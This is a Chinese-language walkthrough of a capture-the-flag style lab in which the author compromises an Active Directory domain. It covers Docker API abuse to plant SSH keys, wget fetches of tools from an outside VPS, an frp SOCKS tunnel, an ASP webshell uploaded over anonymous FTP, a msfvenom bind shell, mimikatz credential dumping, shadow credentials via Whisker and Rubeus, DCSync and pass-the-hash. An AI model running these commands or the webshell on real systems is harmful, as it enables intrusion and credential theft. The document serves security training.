靶标介绍:
Unauthorized是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。
刚开始 给了我们个目标IP
4x.xx.xx.xx
我们直接使用fscan来进行扫描
fscan -h 4x.xx.xxx.xxx
得到一个docker-api 未授权 rce 的显示
访问web页面
http://4x.xx.xxx.xxx:2375/version
得到一些信息 这就说明了docker 未授权rce是能够利用的
然后我们找一台有docker命令的机器
sudo docker -H tcp://4x.xx.xxx.xxx:2375 ps
然后我们以特权模式启动容器
这样是为了能够挂载目标机器的磁盘
sudo docker -H tcp://4x.xx.xxx.xxx:2375/ run -it --privileged alpine /bin/sh
查看本地磁盘
fdisk -l
建个目录并且挂载
mkdir test
mount /dev/vda1 test
cd test
然后我们就能操作本地的磁盘了
刚fscan扫到他的ssh端口是开的
所以我这里不采用反弹shell
直接通过写authorized_keys 认证密钥来进行登录
ssh-keygen -t rsa生成
把这一段拿出来
echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDxhz0QVkYVTnkpbUZIU93QjJsRrWNR3u2TeRAhcMHK62qijD81sgq8LKcGbKYqHFD0eX7uCsr1f7pPilQRC+WVSsRG/icU4nYqSyQudu3KjzReqFfnT1XDswSObq3jzFyqDA0jhyNADRvvWOr8bDPlHbeLoFAMKqRzA9eiQjfhQ8MWdOLZIFxaSbu8G93h5XkablZapeL02f89icm4gK8KLC1rVWwJdCJqDXtBm91xKfAkGwKTni//g5tmhtvYFZ6LPiWG8a4vS885ZmrXwvtFZ+MIJUUDqQlaJPs2coEpmV+11ivRlEhy5LG48JCLl3QbGunTC1kDLUBj8rY+3YmIQ9A9Ymv33Wse4CjFBS3jcLl7b6QzT/OIzU8Nu0/fwpBbHE+ZSl45E9CaHEsbAGcdNJLY372ozEaoK8nV67cn3+UML7iM2T+TkvAoduwzk/+7Bmv2KW4fMJYN1Ejfit+g6+X6m5yA5SVSuZQUpzWCp54wBJR62ImpUFZM9vJ1mFE= kali@DESK >>/test/root/.ssh/authorized_keys
我们这样子就行了
直接ssh登录就能成功到机器上面
然后查看flag
flag不在文件,但是在数据库里
很明显是第二个
打到这里之后就是内网横向了
上传fscan
在公网整台vps 运行 然后靶机远程wget下载
python3 -m http.server 8080
wget 1xx.xx.xx.xx:8080/fscan
在下载frpc 搭建隧道
wget 1xx.xx.xx.xx:8080/frpc
wget 1xx.xx.xx.xx:8080/frpc.ini
- frpc.ini
[common]
server_addr = 1xx.xx.xx.xx
server_port = 7001
[socks_proxy]
type = tcp
remote_port =8886
plugin = socks5
然后就是给权限并且运行
root@localhost:/tmp# chmod +x *
root@localhost:/tmp# ./fscan -h 172.22.7.13/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.1
start infoscan
(icmp) Target 172.22.7.13 is alive
(icmp) Target 172.22.7.6 is alive
(icmp) Target 172.22.7.31 is alive
(icmp) Target 172.22.7.67 is alive
[*] Icmp alive hosts len is: 4
172.22.7.67:445 open
172.22.7.13:2375 open
172.22.7.6:88 open
172.22.7.31:445 open
172.22.7.6:445 open
172.22.7.67:8081 open
172.22.7.67:139 open
172.22.7.31:139 open
172.22.7.6:139 open
172.22.7.67:135 open
172.22.7.31:135 open
172.22.7.6:135 open
172.22.7.13:80 open
172.22.7.67:80 open
172.22.7.67:21 open
172.22.7.13:22 open
[*] alive ports len is: 16
start vulscan
[*] 172.22.7.67 XIAORANG\WIN-9BMCSG0S
[*] 172.22.7.31 XIAORANG\ADCS
[*] 172.22.7.6 [+]DC XIAORANG\DC02
[+] NetInfo:
[*]172.22.7.67
[->]WIN-9BMCSG0S
[->]172.22.7.67
[+] NetInfo:
[*]172.22.7.31
[->]ADCS
[->]172.22.7.31
[+] NetInfo:
[*]172.22.7.6
[->]DC02
[->]172.22.7.6
[*] WebTitle:http://172.22.7.13 code:200 len:27170 title:某某装饰
[*] WebTitle:http://172.22.7.13:2375 code:404 len:29 title:None
[+] ftp://172.22.7.67:21:anonymous
[->]1-1P3201024310-L.zip
[->]1-1P320102603C1.zip
[->]1-1P320102609447.zip
[->]1-1P320102615Q3.zip
[->]1-1P320102621J7.zip
[->]1-1P320102J30-L.zip
[*] WebTitle:http://172.22.7.67 code:200 len:703 title:IIS Windows Server
[*] WebTitle:http://172.22.7.67:8081 code:200 len:4621 title:公司管理后台
[+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file
[+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak
已完成 16/16
[*] 扫描结束,耗时: 21.061062708sroot@localhost:/tmp#
root@localhost:/tmp# ./frpc -c ./frpc.ini &
[1] 3616
root@localhost:/tmp# 2022/10/17 17:48:09 [I] [service.go:301] [f866e9720aae6cbe] login to server success, get run id [f866e9720aae6cbe], server udp port [0]
2022/10/17 17:48:09 [I] [proxy_manager.go:144] [f866e9720aae6cbe] proxy added: [socks_proxy]
2022/10/17 17:48:09 [I] [control.go:180] [f866e9720aae6cbe] [socks_proxy] start proxy success
然后就是分析内网资产
本地用proxifier连接好代理配置好规则
访问内网的web页面
可以看到 这里还存在一个www.zip的源码泄露
下载下来并进行分析
这里存在这和ftp 内容一样的文件
这说明他的ftp目录挂在在他的download下面了
那我们就直接往download 里面上传webshell
asp 一句话
<%eval request("pass")%>
root@localhost:/tmp# ftp 172.22.7.67
Connected to 172.22.7.67.
220 Microsoft FTP Service
Name (172.22.7.67:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-09-22 09:29PM 25356 1-1P3201024310-L.zip
07-09-22 09:29PM 42984 1-1P320102603C1.zip
07-09-22 09:29PM 39333 1-1P320102609447.zip
07-09-22 09:29PM 38231 1-1P320102615Q3.zip
07-09-22 09:29PM 43240 1-1P320102621J7.zip
07-09-22 09:28PM 25105 1-1P320102J30-L.zip
07-09-22 09:29PM 29023 1-1P3201210390-L.zip
07-09-22 09:29PM 41885 1-1P3201211110-L.zip
07-09-22 09:29PM 36787 1-1P3201211380-L.zip
07-09-22 09:29PM 31986 1-1P3201211570-L.zip
07-09-22 09:30PM 9733 1-1P320163434135.zip
07-09-22 09:29PM 12172 1-1P320163J2J2.zip
07-09-22 09:29PM 8705 1-1P320163P3963.zip
226 Transfer complete.
ftp> exit
221 Goodbye.
root@localhost:/tmp# echo '<%eval request("pass")%>' > a.asp
root@localhost:/tmp# ftp 172.22.7.67
Connected to 172.22.7.67.
220 Microsoft FTP Service
Name (172.22.7.67:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put a.asp
local: a.asp remote: a.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
26 bytes sent in 0.00 secs (1.3050 MB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-09-22 09:29PM 25356 1-1P3201024310-L.zip
07-09-22 09:29PM 42984 1-1P320102603C1.zip
07-09-22 09:29PM 39333 1-1P320102609447.zip
07-09-22 09:29PM 38231 1-1P320102615Q3.zip
07-09-22 09:29PM 43240 1-1P320102621J7.zip
07-09-22 09:28PM 25105 1-1P320102J30-L.zip
07-09-22 09:29PM 29023 1-1P3201210390-L.zip
07-09-22 09:29PM 41885 1-1P3201211110-L.zip
07-09-22 09:29PM 36787 1-1P3201211380-L.zip
07-09-22 09:29PM 31986 1-1P3201211570-L.zip
07-09-22 09:30PM 9733 1-1P320163434135.zip
07-09-22 09:29PM 12172 1-1P320163J2J2.zip
07-09-22 09:29PM 8705 1-1P320163P3963.zip
10-17-22 05:55PM 26 a.asp
226 Transfer complete.
ftp>
上传完成
然后用Godzilla 或者其他工具连接
紧接着就生成木马去正向连接上线
因为目标机器是不出网的 所以反弹没用
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4445 -f exe -o 1.exe
紧接着就运行
运行之后用msf去连接这个监听的4445端口
msf6> use exploit/multi/handler
msf6> set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set proxies socks5:1xx.xx.xx.xx:8886
msf6 exploit(multi/handler) > set RHoST 172.22.7.67
RHoST => 172.22.7.67
msf6 exploit(multi/handler) > set LPORT 4445
LPORT => 4445
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 172.22.7.67:4445
NOTE: Rex::Socket.gethostbyname is deprecated, use getaddress, resolve_nbo, or similar instead. It will be removed in the next Major version
[*] Sending stage (200774 bytes) to 172.22.7.67
[*] Meterpreter session 3 opened (192.168.1.104:58373 -> 1xx.xx.xx.xx:8886) at 2022-10-17 18:01:44 +0800
meterpreter >
然后直接用getsystem就能提权
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
然后load kiwi 抓取hash
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
WIN-9BMCSG0S$ XIAORANG a85436900fad5521ab67cf6bc5ecf13a 7798c121e94987889f967251afdeb029562ca579
zhangfeng XIAORANG 97db334121c5d97762be2bf549a5eb34 e197e0a2d4cd8de4196e8758a70814ba11689767 46b7d9fb7ad9ff9b6ef089249690dd56
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN-9BMCSG0S$ XIAORANG (null)
zhangfeng XIAORANG (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN-9BMCSG0S$ xiaorang.lab 2e 71 03 fd 8f d8 12 79 30 be 2f 69 71 bd 21 a9 a9 28 21 0b 38 94 f9 cb a5 0e a0 63 f3 b6 f3 0c ad a9 a6 5d c3 c1 98 f9 d4 df
0a af 1b ec c6 e0 98 59 5d f8 5d ad 34 7d dc a3 f6 b3 e1 34 7c 94 e7 54 a7 0c 94 fa ba 37 c5 6c 9c 84 d3 53 89 a3 29 31 34 7
6 6d 4f e8 a4 05 a2 f1 6c bf 6c 26 dc ba ac a7 56 2c e1 c7 47 98 c5 2a 5c 77 10 98 1c f8 2d b7 35 8e b2 0f 3a 82 22 13 22 fa
c7 b9 e9 b4 0d fb 5d e1 c9 bd d5 37 e0 bb 85 5f 21 53 90 c1 58 cd 4e c2 13 c2 60 be 4c 59 1a 87 dc ea 0e 9a fb d8 8a 9f cd 50
7e a7 b7 01 cf e4 d8 86 0d 5a a9 7b 03 09 f0 f1 19 fa 87 2b c2 63 9b d2 58 64 b5 b0 96 54 d6 3d 57 a7 91 48 88 e5 51 2d c5 4
2 5f b7 db a0 3a 9f b7 99 10 59 e3 d6 91 fc 98 cf c4 d2 8b a0 c0 48 51 19 91 cb ec 33 76 3a d5
win-9bmcsg0s$ XIAORANG.LAB (null)
zhangfeng XIAORANG.LAB FenzGTaVF6En
进去他的shell进一步的收集信息
meterpreter > shell
Process 4256 created.
Channel 1 created.
Microsoft Windows [�汾 10.0.17763.2928]
(c) 2018 Microsoft Corporation����������Ȩ����
C:\inetpub\wwwroot\background\download>net user /domain
net user /domain
������������ xiaorang.lab ��������������
\\DC02.xiaorang.lab ���û��ʻ�
-------------------------------------------------------------------------------
Administrator chenjian chenjun
chentao chenwei chenyong
Guest krbtgt lijun
liliang liting liuping
zhangfeng zhangjian zhangjie
zhangkai zhangli zhangpeng
zhangyong
����������ϣ�������һ����������
C:\inetpub\wwwroot\background\download>net user
net user
\\ ���û��ʻ�
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
WDAGUtilityAccount
����������ϣ�������һ����������
C:\inetpub\wwwroot\background\download>net time /domain
net time /domain
\\DC02.xiaorang.lab �ĵ�ǰʱ���� 2022/10/17 18:08:49
����ɹ���ɡ�
C:\inetpub\wwwroot\background\download>net user zhangfeng /domain
net user zhangfeng /domain
������������ xiaorang.lab ��������������
�û��� zhangfeng
ȫ��
ע��
�û���ע��
����/�������� 000 (ϵͳĬ��ֵ)
�ʻ����� Yes
�ʻ����� �Ӳ�
�ϴ��������� 2022/7/9 16:31:53
���뵽�� �Ӳ�
����ɸ��� 2022/7/10 16:31:53
��Ҫ���� Yes
�û����Ը������� Yes
����Ĺ���վ All
��¼�ű�
�û������ļ�
��Ŀ¼
�ϴε�¼ 2022/10/10 4:05:24
������ĵ�¼Сʱ�� All
�������Ա
ȫ�����Ա *Key Admins *Domain Users
����ɹ���ɡ�
C:\inetpub\wwwroot\background\download>
这里我们能知道zhangfeng这个用户是在key Admins 管理组的
那我们就能通过这个来进行利用
在这之前需要我们把权限给迁移到xiaorang/zhangfeng 这个域账户上去
这里我用incognito这个模块去进行更改权限
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
IIS APPPOOL\background
NT AUTHORITY\SYSTEM
XIAORANG\zhangfeng
Impersonation Tokens Available
========================================
NT AUTHORITY\IUSR
meterpreter > impersonate_token "XIAORANG\zhangfeng"
[+] Delegation token available
[+] Successfully impersonated user XIAORANG\zhangfeng
meterpreter > shell
Process 2848 created.
Channel 2 created.
Microsoft Windows [�汾 10.0.17763.2928]
(c) 2018 Microsoft Corporation����������Ȩ����
C:\inetpub\wwwroot\background\download>whoami
whoami
xiaorang\zhangfeng
权限更改完成之后就可以针对他的这个key admins组去进行利用 更多详细
首先https://github.com/eladshamir/Whisker 去这个项目下载源码 并进行编译
然后上传到目标系统上去
进去他的shell
Whisker.exe add /target:DC02$ /domain:xiaorang.lab /dc:DC02.xiaorang.lab
得到这个
然后还要上传 Rubeus.exe https://github.com/GhostPack/Rubeus 这个项目去下载
这里要加上一个/ptt 这个命令是把票据导入内存中 我看上面的回显是没有加的
Rubeus.exe asktgt /user:DC02$ /certificate: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 /password:"v1FkG1vTFGEO0abD" /domain:xiaorang.lab /dc:DC02.xiaorang.lab /getcredentials /show /ptt
到这里我们就能直接用mimikatz去dump域控管理员的hash了
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:xiaorang\Administrator" exit
成功得到域控管理员的hash
然后就可以用impacket工具包里的wmiexec去横向上域控了
$ impacket-wmiexec xiaorang.lab/administrator:@172.22.7.6 -hashes :bf967c5a0f7256e2eaba589fbd29a382
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
DC02
C:\>type C:\users\administrator\flag\*
C:\users\administrator\flag\flag03.txt
__ __ __ __ __ __
/ | / | / | / | / | / |
$$ | $$ | _______ ______ __ __ _$$ |_ $$ |____ ______ ______ $$/ ________ ______ ____$$ |
$$ | $$ |/ \ / \ / | / |/ $$ | $$ \ / \ / \ / |/ | / \ / $$ |
$$ | $$ |$$$$$$$ | $$$$$$ |$$ | $$ |$$$$$$/ $$$$$$$ |/$$$$$$ |/$$$$$$ |$$ |$$$$$$$$/ /$$$$$$ |/$$$$$$$ |
$$ | $$ |$$ | $$ | / $$ |$$ | $$ | $$ | __ $$ | $$ |$$ | $$ |$$ | $$/ $$ | / $$/ $$ $$ |$$ | $$ |
$$ \__$$ |$$ | $$ |/$$$$$$$ |$$ \__$$ | $$ |/ |$$ | $$ |$$ \__$$ |$$ | $$ | /$$$$/__ $$$$$$$$/ $$ \__$$ |
$$ $$/ $$ | $$ |$$ $$ |$$ $$/ $$ $$/ $$ | $$ |$$ $$/ $$ | $$ |/$$ |$$ |$$ $$ |
$$$$$$/ $$/ $$/ $$$$$$$/ $$$$$$/ $$$$/ $$/ $$/ $$$$$$/ $$/ $$/ $$$$$$$$/ $$$$$$$/ $$$$$$$/
flag04:flag{8xxxxe-4f3xxxx2-8xxxxx-8xxxxx5}
域内另一台ADCS也可以用这种方法远程上去
$ impacket-wmiexec xiaorang.lab/administrator:@172.22.7.31 -hashes :bf967c5a0f7256e2eaba589fbd29a382
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
ADCS
好了至此 打靶结束